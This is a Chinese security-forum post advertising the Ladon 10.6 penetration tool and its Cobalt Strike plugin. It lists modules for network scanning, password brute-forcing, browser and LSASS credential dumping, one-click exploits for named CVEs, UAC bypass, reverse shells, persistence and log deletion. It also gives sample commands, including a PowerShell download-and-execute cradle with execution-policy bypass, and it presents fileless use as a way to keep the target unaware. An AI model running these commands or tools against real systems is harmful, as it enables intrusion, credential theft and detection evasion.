安全矩阵

 找回密码
 立即注册
搜索
查看: 571|回复: 0

Ladon 10.6 & CobaltStirke 祝大家新年快乐

[复制链接]

189

主题

191

帖子

903

积分

高级会员

Rank: 4

积分
903
发表于 2023-1-23 22:30:17 | 显示全部楼层 |阅读模式
Ladon 10.6 & CobaltStirke 祝大家新年快乐 (qq.com)


Ladon简介
Ladon模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。10.6版本内置194个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
使用非常简单:  Ladon 目标 模块

Ladon 192.168.1.1/c MS17010  扫描C段SMB漏洞Ladon https://192.168.1.1 WhatCMS 识别网络设备、CMS等Ladon ip.txt SmbScan    批量IP 445端口密码审计Ladon ip.txt 401Scan    批量IP 401认证密码审记
Ladon 10.6 2023.1.18更新功能

  1. Ladon 10.6 2023.1.18
  2. [u]CiscoPwd      路由器CiscoDump更名为CiscoPwd   
  3. [+]NetGearPwd  路由器DGND3700v2登陆密码读取
  4. [+]MSNSwitchPwd  路由器MSNSwitch登陆密码读取 CVE-2022-32429
  5. [u]WhatCMS     智能识别未知网络设备(路由器、打印机、摄像头等)
  6. [u]RunAs    以另一用户身份执行命令 模拟用户登陆执行命令


  7. Ladon 10.5 2023.1.11
  8. [+]GetID 获取电脑唯一标识UUID、GUID、Bios、硬盘、CPU、MAC地址(所有网卡,之前版本只获取在用网卡MAC)
  9. [u]WhatCMS 支持以下品牌路由器识别
  10. Broadband
  11. Sagemcom系列
  12. Sagemcom TR-069
  13. NETGEAR系列
  14. NETGEAR R6400
  15. NETGEAR R8000P
  16. NETGEAR R6700v3
  17. NETGEAR WGR614v9
  18. MI系列
  19. Router MI-3
  20. D-link系列
  21. D-LINK DIR-650IN
  22. D-Link Wireless N DIR-524
  23. COMMSCOPE
  24. ASUS系列
  25. ASUS WL-500gP
  26. TP-LINK系列
  27. TP-Link C2
  28. ZyXEL系列
  29. ZyXEL Keenetic II
  30. Cisco
  31. Cisco Linksys系列
  32. Linksys WRT54GL
  33. Linksys E2500
  34. Cisco Broadband Access Center
  35. Huawei系列
  36. HUAWEI-3COM BR104
  37. H3C系列
  38. VisualSVN Server
复制代码
Ladon Study 学习模式 一键渗透
对于不熟悉Ladon的新手,可本地使用Study学习,也可直接一键使用。功能模块分类详细,一目了然。GUI程序不方便命令行下渗透,内渗时我们开好代理之后,本地使用即可非常方便。如果你正在渗透外网,批量挖洞提交SRC,就不用做代理了,使用对应模块,扫指定C段即可。
编辑
Ladon GUI 加密解密、混淆免杀、处理资产、反弹SHELL
Wiki: http://k8gege.org/Ladon  也可GUI上直接搜索关键字查看
编辑
LadonEXP 不懂编程,一键生成EXP
编辑
Ladon 10.6 For PowerShell
发现一些LS在使用Github上的旧版,PowerShell内存加载使用,反倒是一些渗透的直接把EXE丢过去使用,当然可能也有不少人内存加载Ladon无文件落地渗透扫描。

  1. 0x001 Cmd
  2. powershell
  3. Import-Module .\Ladon.ps1
  4. Ladon OnlinePC

  5. 0x002 Local
  6. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

  7. 0x003 Remote
  8. powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

  9. 0x004 Bypass
  10. powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

  11. 0x005 Diy PortScan
  12. powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'
复制代码



编辑

Ladon 10.6 For Cobalt Strike

发现一些LS在使用Github上的旧版,PowerShell内存加载使用,反倒是一些渗透的直接把EXE丢过去使用,当然可能也有不少人内存加载Ladon无文件落地渗透扫描。
10.6插件包含209个功能,大家按需使用,GUI右键分类详细直观。当目标上控CS后,加载cna脚本,使用Ladon执行任何动作都是内存加载,无需落地程序,不管是直接beacon命令行还是GUI右键菜单操作。以下情况只需上传相关txt,若需要批量扫描C段比如内网有100个C段使用ip24.txt,内网有10个B段使用ip16.txt,密码审计需上传对应密码字典如user.txt、pass.txt或userpass.txt,对应模块运行需加载,寻找路径为当前执行命令目录,所以需要上传这些无害的txt,执行Ladon时,CD到存有这些TXT目录即可,无需上传Ladon.exe,就是整个过程目标不知道你用Ladon横向渗透。

编辑
编辑
正在上传…重新上传取消
编辑
编辑
编辑
编辑
编辑
编辑
编辑


  1. =======================
  2. Ladon 10.6 巨龙拉冬
  3. CS右键209个功能模块
  4. Update 2023.01.18
  5. =======================

  6. 0x001 网络资产收集 22

  7. 1.多协议探测存活主机
  8. 2.多协议探测存活IP
  9. 3.仅ICMP探测存活(快)
  10. 4.系统Ping探测存活
  11. 5.Oxid多网卡主机探测
  12. 6.DNS多网卡主机探测
  13. 7.多协议操作系统探测
  14. 8.网站、标题、Banner
  15. 9.智能网站CMS识别
  16. 10.端口扫描-服务探测
  17. 11.Shiro网站探测
  18. 12.Cisco设备探测
  19. 13.SSL证书探测
  20. 14.WP插件信息探测
  21. 15.LDAP服务器探测
  22. 16.FTP服务器探测
  23. 17.枚举MSSQL服务器
  24. 18.枚举共享资源
  25. 19.打印机探测
  26. 20.Exchange版本探测
  27. 21.HTTP/S探测返回头
  28. 22.HTTP/S探测网页域名


  29. 0x002 系统信息探测 8

  30. 1.SMB探测系统信息
  31. 2.WMI探测系统信息
  32. 3.NBT探测系统信息
  33. 4.RDP探测系统信息
  34. 5.SNMP探测系统信息
  35. 6.MSSQL探测系统信息
  36. 7.WINRM探测系统信息
  37. 8.Exchange探测系统信息

  38. 0x003 远程漏洞检测 11

  39. 1.SMB永恒之蓝检测-445
  40. 2.SMB永恒之黑检测-445
  41. 3.Struts2漏洞检测-WEB
  42. 4.Weblogic漏洞检测-WEB
  43. 5.PhpStudy后门检测-WEB
  44. 6.ActiveMQ漏洞检测-WEB
  45. 7.Tomcat漏洞检测-WEB
  46. 8.CVE-2020-8515漏洞检测-WEB
  47. 9.CVE-2022-23164漏洞检测-WEB
  48. 10.Zimbra邮服CVE-2022-27925漏洞检测-WEB
  49. 11.打印机PJL远程代码执行漏洞检测

  50. 0x004 本机信息收集 20

  51. 1.查看本机IP(内外网)
  52. 2.当前用户、特权信息
  53. 3.GUID、CPUID、DiskID
  54. 4.基础信息(仅cmd获取)
  55. 5.基础信息(含wmi获取)
  56. 6.获取命令行参数
  57. 7.获取进程详细信息
  58. 8.查看IE代理信息
  59. 9.查看本机命名管道
  60. 10.查看3389远程连接
  61. 11.查看USB使用记录
  62. 12.查看管理员组用户
  63. 13.查看最近访问文件
  64. 14.查看安装.NET版本
  65. 15.查看PowerShell版本
  66. 16.查看已安装程序版本
  67. 17.查看OS倍数.NET版本
  68. 18.列全盘目录(RAR打包)
  69. 19.查看注册表启动项、
  70. 20.查看系统劫持DLL

  71. 0x005 本机密码读取 13

  72. 1 Chrome浏览器密码
  73. 2 Firefox浏览器密码
  74. 3 CocCoc浏览器密码
  75. 4 Edge浏览器密码
  76. 5 Wifi连接密码
  77. 6 IIS站点密码
  78. 7 FileZilla FTP密码
  79. 8 VPN连接密码 CVE-2021-36934
  80. 9 Dump Lass密码
  81. 10 Navicat密码
  82. 11 TeamView密码
  83. 12 Xshell密码
  84. 13 SecureCRT密码

  85. 0x006 一键GetShell远程漏洞EXP 11

  86. 1.Exchange CVE-2020-0688
  87. 2.Weblogic GetShell
  88. 3.Tomcat GetShell
  89. 4 Confluence CVE-2022-23164漏洞EXP
  90. 5 DrayTek CVE-2020-8515漏洞EXP
  91. 6 Zimbra邮服CVE-2022-27925漏洞EXP
  92. 7 ForiGate CVE-2022-40684 EXP
  93. 8 Mikrotik CVE-2018-14847 Exp
  94. 9 MSNSwitch路由器密码读取EXP
  95. 10 NetGear路由器密码读取EXP
  96. 11 Cisco RV320/325路由器密码读取EXP

  97. 0x007 网络密码嗅探 2

  98. 1.FTP密码嗅探
  99. 2.HTTP密码嗅探

  100. 0x008 网络密码审计 24

  101. 1.445端口SMB密码审计(Windows)
  102. 2.135端口WMI密码审计(Windows)
  103. 3.445端口SMB-HASH密码审计(Windows)
  104. 4.135端口WMI-HASH密码审计(Windows)
  105. 5.139端口NBT密码审计(Windows)
  106. 6.5985端口Winrm密码审计(Windows)
  107. 7.21端口FTP密码审计(多平台)
  108. 8.5900端口VNC密码审计(多平台)
  109. 9.389端口LDAP密码审计(Windows)
  110. 10.1521端口Oracle数据库密码审计(多平台)
  111. 11.1433端口MSSQL数据库密码审计(Windows)
  112. 12.3306端口MYSQL数据库密码审计(多平台)
  113. 13.7001端口Weblogic后台密码审计(多平台)
  114. 14.Web端口Tomcat后台密码审计(多平台)
  115. 15.Web端口401基础认证密码审计(多平台)
  116. 16.22端口SSH密码审计(Linux_多平台)
  117. 17.网络摄像头密码审计(401认证)
  118. 18.WEB网站后台目录/页面存活扫描
  119. 19 443端口Exchange密码审计(Windows)
  120. 20 WordPress后台密码审计(Web)
  121. 21 Draytek路由器密码审计(Web)
  122. 22 Cisco路由器密码审计(Web)
  123. 23 ZTE中兴路由器密码审计(Web)[X]
  124. 24 ZTE中兴路由器密码审计(Telnet)

  125. 0x009 本机执行 5

  126. 1.sc服务执行(system权限)
  127. 2.at计划任务(system权限)
  128. 3.Runas(模拟用户执行)
  129. 4.RunPS(无powershell执行)
  130. 5.ForExec(循环执行命令)

  131. 0x010 远程执行 15

  132. 1.WinrmExec
  133. 2.SshExec
  134. 3.SmbExec
  135. 4.PsExec
  136. 5.AtExec
  137. 6.WmiExec
  138. 7.WmiExec2
  139. 8.WinrmExec
  140. 9.JspShell
  141. 10.AspShell
  142. 11.AspxShell
  143. 12.PhpShell
  144. 13.MssqlCmd
  145. 14.OracleCmd
  146. 15.MysqlCmd

  147. 0x011 本地提权 12

  148. 1.BypassUac
  149.   1.eventvwr
  150.   2.fodhelper
  151.   3.computerdefaults
  152.   4.sdclt
  153.   5.slui

  154. 2.BypassUac2
  155. 3.Admin2System
  156. 4.System2Admin
  157. 5.Runas
  158. 6.ms16135 X64
  159. 7.BadPotato
  160. 8.SweetPotato
  161. 9.RDPHijack
  162. 10.CVE-2021-1675
  163. 11.Priviledges
  164.   0.SetPriviledge
  165.   1.SetDebugPriv
  166.   2.SetAuditPriv
  167.   3.SetImpersonate
  168.   4.SetCreateToken
  169.   5.SetAssignPrimaryToken
  170. 12.Beacon2System

  171. 0x012 自启动 2

  172. 1.注册表自启动
  173. 2.服务启动项

  174. 0x013 3389远程桌面 6

  175. 1.一键开启3389
  176. 2.查看3389远程连接
  177. 3.查看管理员组用户
  178. 4.激活Administrator
  179. 5.激活用户Guest
  180. 6.远程桌面会话劫持

  181. 0x014 远程下载 2

  182. 1.Http文件下载
  183. 2.FTP文件下载

  184. 0x015 域(DC、LDAP) 6

  185. 1.域内机器信息获取(域内)
  186. 2.389端口LDAP服务器探测
  187. 3.389端口LDAP密码审计
  188. 4.CVE-2020-1472域控提权
  189. 5 枚举域内主机、IP、共享资源
  190. 6 查询域内用户机器名、IP(域内)

  191. 0x016 端口转发 2

  192. 1.netsh(系统自带)
  193. 2.PortTran

  194. 0x017 MSF/NC联动 6

  195. 1.Shell_bind_tcp
  196. 2.Shell_reverse_tcp
  197. 3.Met_reverse_http
  198. 4.Met_reverse_https
  199. 5.Shell_reverse_icmp
  200. 6.Shell_reverse_dns

  201. 0x018 其它功能 10

  202. 1.内存加载.NET测试
  203. 2.PowerShell测试版本
  204. 3.Win2008启用.net3.5
  205. 4.网站HTML源码查看
  206. 5.网站域名解析IP
  207. 6.PC机器名解析IP
  208. 7 删除Tomcat指定IP日志
  209. 8 改注册表读取系统明文密码
  210. 9 修改注册表劫持签名签证
  211. 10 读取大文件指定长度内容

  212. 以下为系统自带命令,Ladon无法加载也不影响
  213. 0x019 CMD命令信息收集 15+10+5
  214. 0.查看系统信息
  215. 1.查看.NET版本
  216. 2.查看保存凭证
  217. 3.查看Defender
  218. 4.查看当前特权
  219. 5.查看当前WIFI
  220. 6.查看机器GUID
  221. 7.查看机器名称
  222. 8.查看RDP端口
  223. 9.查看进程列表
  224. 10.查看服务列表
  225. 11.查看安装程序
  226. 12.查看启动列表
  227. 13.查看防火墙规则
  228. 14.查看路由表信息
  229. 15.查看网络连接
  230. 16.用户操作
  231.   1.查看当前用户
  232.   2.查看本机管理员
  233.   3.查看本机用户
  234.   4.查看域管理员
  235.   5.查看域用户
  236.   6.激活Administrator
  237.   7.激活Guest
  238.   8.Guest加管理员组
  239.   9.禁用Administrator
  240.   10.禁用Guest
  241. 17.查看机器列表
  242. 18.查看补丁信息
  243. 19.域信息收集
  244.   1 查看当前登陆域
  245.   2 查看域信息
  246.   3 查看域时间
  247.   4 查看域管理员
  248.   5 查看域用户

  249. 0x020 PowerShell信息收集 2
  250. 1.查看PowerShell版本
  251. 2.查看当前登陆用户
  252. ...其它功能下版本更新
复制代码

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 07:55 , Processed in 0.015364 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表